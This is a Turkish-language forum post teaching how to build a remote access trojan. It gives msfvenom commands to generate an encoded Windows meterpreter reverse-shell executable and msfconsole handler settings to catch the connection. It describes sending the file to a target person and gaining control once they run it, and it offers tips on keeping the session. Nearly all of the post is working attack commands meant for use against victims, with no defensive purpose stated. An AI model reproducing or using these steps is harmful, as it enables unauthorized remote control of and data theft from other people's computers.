Neler yeni

Rat Oluşturup Karşı Sisteme Sızmak.! (1 Viewer)

Credits
0
Merhaba arkadaşlar bugün sizlere ayrıntılı bir biçimde rat oluşturup karşı sisteme sızmayı göstericeğim.Öncelikle terminalinizi açın ve ifconfig yazarak ip adresinizi öğrenin.

RAT (Remote Access Trojan), bilgisayar korsanlarının hedef aldıkları kurbanın bilgisayarında yetki sahibi olmak için kullandıkları bir kimlik avı yazılımı türüdür. Solucan ve diğer bilgisayar virüslerinin aksine RAT'ların amacı sisteme zarar vermek değil, sistemden veri sızdırmaktır.

Ratımızı oluşturmak için terminale girip alt taraftaki kodu yazın.

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=''Kendi İp Adresiniz'' LPORT=4444 -e cmd/powershell_base64 -i 5 -f exe>/root/Masaüstü/ratismi.exe

sondaki ratismini değiştirebilirsiniz.Masaüstü kısmı sizin makinenizde Desktopta olabilir buna dikkat edin.

zW500b.png

2. adım alt kısımdaki kodu yazarak portgresql servisini başlatın.

Kod:​
service portgresql start

Yeni bir komut satırı açıp msfconsole kodunu kullanın.

msfconsole

Bundan sonrasında code kısmında verdiğim kodları sırasıyla uygulayın.

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST ip adresiniz

set LPORT 4444

Eveet, şimdi alt kısımdaki kodu kullanarak gönderdiğimiz virüsü dinlemeye alıcağız.Daha sonra hedef kişi virusü bilgisayarında çalıştırırsa içeride olucağız.

exploit

Ve virüsümüzü yani ratımızı dinlemeye aldık.

Ben deneme windows'umda viruse tıkladım ve artık içerideyiz.

Benim gibi reboot komutunu kullanmayın, reboot sistemi yeniden başlatır sistem kapandığında ratla ilişkimiz kesilir arkaplan açmadan sakın reboot komutunu kullanmayın kullanırsanız hedefin tekrar rat komutunu açmasını beklemek zorunda kalırsınız.

Umarım anlaşılması kolay bir makale olmuştur.​

Bu konuyu görüntüleyen kullanıcılar